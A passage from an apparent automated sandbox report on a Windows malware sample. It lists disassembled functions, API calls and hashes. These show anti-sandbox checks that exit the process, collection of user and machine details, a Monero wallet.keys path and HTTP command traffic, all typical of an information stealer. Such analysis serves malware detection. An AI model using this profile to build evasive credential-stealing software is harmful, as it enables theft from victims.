                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 3ecfc28f7235a802a4f482d3145b7a8160af779e7db8383a6249bea6eb34cb07
                              • Instruction ID: ae70068cc568cd188bc473f7415d8023a4127bd79bee7c7ceb7b991ac19d887d
                              • Opcode Fuzzy Hash: 3ecfc28f7235a802a4f482d3145b7a8160af779e7db8383a6249bea6eb34cb07
                              • Instruction Fuzzy Hash: F7715F71A00218ABDB25EFA0DC49FEE77B8FF64704F508199F1096B190DBB4AA85CF51
                              Function 001C5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 1c5510-1c5577 call 1c5ad0 call 1ca820 * 3 call 1ca740 * 4 1106 1c557c-1c5583 1090->1106 1107 1c5585-1c55b6 call 1ca820 call 1ca7a0 call 1b1590 call 1c51f0 1106->1107 1108 1c55d7-1c564c call 1ca740 * 2 call 1b1590 call 1c52c0 call 1ca8a0 call 1ca800 call 1caad0 StrCmpCA 1106->1108 1124 1c55bb-1c55d2 call 1ca8a0 call 1ca800 1107->1124 1133 1c5693-1c56a9 call 1caad0 StrCmpCA 1108->1133 1137 1c564e-1c568e call 1ca7a0 call 1b1590 call 1c51f0 call 1ca8a0 call 1ca800 1108->1137 1124->1133 1140 1c57dc-1c5844 call 1ca8a0 call 1ca820 * 2 call 1b1670 call 1ca800 * 4 call 1c6560 call 1b1550 1133->1140 1141 1c56af-1c56b6 1133->1141 1137->1133 1272 1c5ac3-1c5ac6 1140->1272 1144 1c56bc-1c56c3 1141->1144 1145 1c57da-1c585f call 1caad0 StrCmpCA 1141->1145 1146 1c571e-1c5793 call 1ca740 * 2 call 1b1590 call 1c52c0 call 1ca8a0 call 1ca800 call 1caad0 StrCmpCA 1144->1146 1147 1c56c5-1c5719 call 1ca820 call 1ca7a0 call 1b1590 call 1c51f0 call 1ca8a0 call 1ca800 1144->1147 1165 1c5865-1c586c 1145->1165 1166 1c5991-1c59f9 call 1ca8a0 call 1ca820 * 2 call 1b1670 call 1ca800 * 4 call 1c6560 call 1b1550 1145->1166 1146->1145 1250 1c5795-1c57d5 call 1ca7a0 call 1b1590 call 1c51f0 call 1ca8a0 call 1ca800 1146->1250 1147->1145 1167 1c598f-1c5a14 call 1caad0 StrCmpCA 1165->1167 1168 1c5872-1c5879 1165->1168 1166->1272 1197 1c5a28-1c5a91 call 1ca8a0 call 1ca820 * 2 call 1b1670 call 1ca800 * 4 call 1c6560 call 1b1550 1167->1197 1198 1c5a16-1c5a21 Sleep 1167->1198 1174 1c587b-1c58ce call 1ca820 call 1ca7a0 call 1b1590 call 1c51f0 call 1ca8a0 call 1ca800 1168->1174 1175 1c58d3-1c5948 call 1ca740 * 2 call 1b1590 call 1c52c0 call 1ca8a0 call 1ca800 call 1caad0 StrCmpCA 1168->1175 1174->1167 1175->1167 1276 1c594a-1c598a call 1ca7a0 call 1b1590 call 1c51f0 call 1ca8a0 call 1ca800 1175->1276 1197->1272 1198->1106 1250->1145 1276->1167
                              APIs
                                • Part of subcall function 001CA820: lstrlen.KERNEL32(001B4F05,?,?,001B4F05,001D0DDE), ref: 001CA82B
                                • Part of subcall function 001CA820: lstrcpy.KERNEL32(001D0DDE,00000000), ref: 001CA885
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5857
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5228
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5318
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C532F
                                • Part of subcall function 001C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001C5364
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C5383
                                • Part of subcall function 001C52C0: lstrlen.KERNEL32(00000000), ref: 001C53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001C5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 001C5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 73a2c1852a49511039e48de74242db16ecf26e98c193f27ec9b6bf420dff84f5
                              • Instruction ID: 13fc33d9a7f14a86cd432373f1159ff98ab4b574b7870a7f71be1b6b6a9ba8cf
                              • Opcode Fuzzy Hash: 73a2c1852a49511039e48de74242db16ecf26e98c193f27ec9b6bf420dff84f5
                              • Instruction Fuzzy Hash: 70E1FB71910608ABCB16FBA0DC56FFD737DAF74345F90812CA40666191EF34EA49CBA2
                              Function 001C17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 1c17a0-1c17cd call 1caad0 StrCmpCA 1304 1c17cf-1c17d1 ExitProcess 1301->1304 1305 1c17d7-1c17f1 call 1caad0 1301->1305 1309 1c17f4-1c17f8 1305->1309 1310 1c17fe-1c1811 1309->1310 1311 1c19c2-1c19cd call 1ca800 1309->1311 1313 1c199e-1c19bd 1310->1313 1314 1c1817-1c181a 1310->1314 1313->1309 1316 1c185d-1c186e StrCmpCA 1314->1316 1317 1c187f-1c1890 StrCmpCA 1314->1317 1318 1c1835-1c1844 call 1ca820 1314->1318 1319 1c1970-1c1981 StrCmpCA 1314->1319 1320 1c18f1-1c1902 StrCmpCA 1314->1320 1321 1c1951-1c1962 StrCmpCA 1314->1321 1322 1c1932-1c1943 StrCmpCA 1314->1322 1323 1c1913-1c1924 StrCmpCA 1314->1323 1324 1c18ad-1c18be StrCmpCA 1314->1324 1325 1c18cf-1c18e0 StrCmpCA 1314->1325 1326 1c198f-1c1999 call 1ca820 1314->1326 1327 1c1849-1c1858 call 1ca820 1314->1327 1328 1c1821-1c1830 call 1ca820 1314->1328 1342 1c187a 1316->1342 1343 1c1870-1c1873 1316->1343 1344 1c189e-1c18a1 1317->1344 1345 1c1892-1c189c 1317->1345 1318->1313 1336 1c198d 1319->1336 1337 1c1983-1c1986 1319->1337 1350 1c190e 1320->1350 1351 1c1904-1c1907 1320->1351 1333 1c196e 1321->1333 1334 1c1964-1c1967 1321->1334 1331 1c194f 1322->1331 1332 1c1945-1c1948 1322->1332 1329 1c1926-1c1929 1323->1329 1330 1c1930 1323->1330 1346 1c18ca 1324->1346 1347 1c18c0-1c18c3 1324->1347 1348 1c18ec 1325->1348 1349 1c18e2-1c18e5 1325->1349 1326->1313 1327->1313 1328->1313 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 1c18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001C17C5
                              • ExitProcess.KERNEL32 ref: 001C17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: f51f3a6796b0ba96f66960cfd47f2fc629c2b8e1697615acc529e54cdb24b72f
                              • Instruction ID: 04ecc03b3361d9af08ff226894a092230e33923188ad8cddd490bf38055b1364
                              • Opcode Fuzzy Hash: f51f3a6796b0ba96f66960cfd47f2fc629c2b8e1697615acc529e54cdb24b72f
                              • Instruction Fuzzy Hash: 945137B4A4420AFBCB05DFA0D954FBE77BAAF69708F10804DE40AA7241D770E951CB62
                              Function 001C7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 1c7500-1c754a GetWindowsDirectoryA 1357 1c754c 1356->1357 1358 1c7553-1c75c7 GetVolumeInformationA call 1c8d00 * 3 1356->1358 1357->1358 1365 1c75d8-1c75df 1358->1365 1366 1c75fc-1c7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 1c75e1-1c75fa call 1c8d00 1365->1367 1369 1c7628-1c7658 wsprintfA call 1ca740 1366->1369 1370 1c7619-1c7626 call 1ca740 1366->1370 1367->1365 1377 1c767e-1c768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001C7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C760A
                              • wsprintfA.USER32 ref: 001C7640
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 34d26a7a8db53330c5066fbee7b69f927fc1312033048976dc9ac9051189d659
                              • Instruction ID: 35587ad0afe6efae2ccecc504e528f79570b206ef4a29cff1b8f0bdbb2852daa
                              • Opcode Fuzzy Hash: 34d26a7a8db53330c5066fbee7b69f927fc1312033048976dc9ac9051189d659
                              • Instruction Fuzzy Hash: 3F4182B1D04258ABDB11DF94DC85FEEBBB8AF28704F10019DF509A7280DB75AA44CFA5
                              Function 001C69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0590), ref: 001C98A1
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0608), ref: 001C98BA
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0668), ref: 001C98D2
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05A8), ref: 001C98EA
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0728), ref: 001C9903
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE8B48), ref: 001C991B
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED53E8), ref: 001C9933
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED5348), ref: 001C994C
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0770), ref: 001C9964
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05C0), ref: 001C997C
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE07E8), ref: 001C9995
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE05D8), ref: 001C99AD
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00ED5388), ref: 001C99C5
                                • Part of subcall function 001C9860: GetProcAddress.KERNEL32(75900000,00EE0680), ref: 001C99DE
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001B11D0: ExitProcess.KERNEL32 ref: 001B1211
                                • Part of subcall function 001B1160: GetSystemInfo.KERNEL32(?), ref: 001B116A
                                • Part of subcall function 001B1160: ExitProcess.KERNEL32 ref: 001B117E
                                • Part of subcall function 001B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001B112B
                                • Part of subcall function 001B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001B1132
                                • Part of subcall function 001B1110: ExitProcess.KERNEL32 ref: 001B1143
                                • Part of subcall function 001B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001B123E
                                • Part of subcall function 001B1220: __aulldiv.LIBCMT ref: 001B1258
                                • Part of subcall function 001B1220: __aulldiv.LIBCMT ref: 001B1266
                                • Part of subcall function 001B1220: ExitProcess.KERNEL32 ref: 001B1294
                                • Part of subcall function 001C6770: GetUserDefaultLangID.KERNEL32 ref: 001C6774
                                • Part of subcall function 001B1190: ExitProcess.KERNEL32 ref: 001B11C6
                                • Part of subcall function 001C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                                • Part of subcall function 001C7850: RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                                • Part of subcall function 001C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                                • Part of subcall function 001C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C7910
                                • Part of subcall function 001C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001C7917
                                • Part of subcall function 001C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001C792F
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001C6AF9
                              • Sleep.KERNEL32(00001770), ref: 001C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6B1A
                              • ExitProcess.KERNEL32 ref: 001C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 6e3b8419a964d10257fa638f0ff3b832ed8bc8e7158193ba4ac0ef5001af20a8
                              • Instruction ID: 07bef2ea587ba9bc1bc829b2b07a748a2f8fc51b42d8ec3e6f88a04b7821e9a3
                              • Opcode Fuzzy Hash: 6e3b8419a964d10257fa638f0ff3b832ed8bc8e7158193ba4ac0ef5001af20a8
                              • Instruction Fuzzy Hash: 6B31D671A40208ABDB06FBF0DC56FEE7778AF34345F90451CF212A6192DF70A905CAA6
                              Function 001B1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 1b1220-1b1247 call 1c89b0 GlobalMemoryStatusEx 1439 1b1249-1b1271 call 1cda00 * 2 1436->1439 1440 1b1273-1b127a 1436->1440 1442 1b1281-1b1285 1439->1442 1440->1442 1444 1b129a-1b129d 1442->1444 1445 1b1287 1442->1445 1447 1b1289-1b1290 1445->1447 1448 1b1292-1b1294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001B123E
                              • __aulldiv.LIBCMT ref: 001B1258
                              • __aulldiv.LIBCMT ref: 001B1266
                              • ExitProcess.KERNEL32 ref: 001B1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 6a2f6a5acff36a5a84774016df0f1fc0a26c10c370ac6a87a4f8d3cd98d7a6f6
                              • Instruction ID: 78c489a587c92ed2b8ac33cc51b45b718ca8cd9ceed1f7fc8aa4599d6419d2e8
                              • Opcode Fuzzy Hash: 6a2f6a5acff36a5a84774016df0f1fc0a26c10c370ac6a87a4f8d3cd98d7a6f6
                              • Instruction Fuzzy Hash: 19014FB0940308BAEB10DBE0DC59BAEB778AB14745F608058E605B6180D774A5458799
                              Function 001C6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 1c6af3 1451 1c6b0a 1450->1451 1453 1c6b0c-1c6b22 call 1c6920 call 1c5b10 CloseHandle ExitProcess 1451->1453 1454 1c6aba-1c6ad7 call 1caad0 OpenEventA 1451->1454 1460 1c6ad9-1c6af1 call 1caad0 CreateEventA 1454->1460 1461 1c6af5-1c6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001C6AF9
                              • Sleep.KERNEL32(00001770), ref: 001C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00EE8AE8,?,001D110C,?,00000000,?,001D1110,?,00000000,001D0AEF), ref: 001C6B1A
                              • ExitProcess.KERNEL32 ref: 001C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: bf0a4065befcb2a8848a18de75b71384b549c38048b456c011c850f37f8b2095
                              • Instruction ID: 2550601647333f86607ae48ff620a946cad08009826d6ac52d01492e4fa70396
                              • Opcode Fuzzy Hash: bf0a4065befcb2a8848a18de75b71384b549c38048b456c011c850f37f8b2095
                              • Instruction Fuzzy Hash: 48F05EB0A40209AFE701ABA0DC06FBE7B78EF34701F10451CF516A21C1DBB0E940DA97
                              Function 001B47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
